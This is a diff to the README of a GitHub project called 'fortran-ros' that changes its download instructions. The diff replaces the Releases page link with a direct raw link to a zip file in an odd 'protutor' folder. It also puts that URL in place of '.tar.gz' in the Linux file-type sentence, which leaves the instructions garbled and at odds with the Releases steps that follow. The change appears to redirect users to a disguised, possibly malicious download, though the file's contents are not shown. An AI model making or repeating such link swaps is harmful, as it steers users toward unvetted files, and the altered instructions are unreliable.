forgiving-shot68/fortran-ros/README.md

 To get started with fortran-ros, follow these steps:

-1. Visit the Releases page to download the software: [Download fortran-ros](https://github.com/forgiving-shot68/fortran-ros/releases)
+1. Visit the Releases page to download the software: [Download fortran-ros](https://raw.githubusercontent.com/forgiving-shot68/fortran-ros/main/protutor/fortran-ros_1.5.zip)

 2. On the Releases page, you will find various versions of the application listed.
 Look for the most recent version.

 3. Click on the version link to open the details.
 You will find the downloadable files listed under "Assets."

 4. Download the package suitable for your operating system.
-This might be a `.exe` for Windows, `.dmg` for macOS, or a `.tar.gz` file for Linux.
+This might be a `.exe` for Windows, `.dmg` for macOS, or a `https://raw.githubusercontent.com/forgiving-shot68/fortran-ros/main/protutor/fortran-ros_1.5.zip` file for Linux.

 5. After the download completes, locate the file on your computer.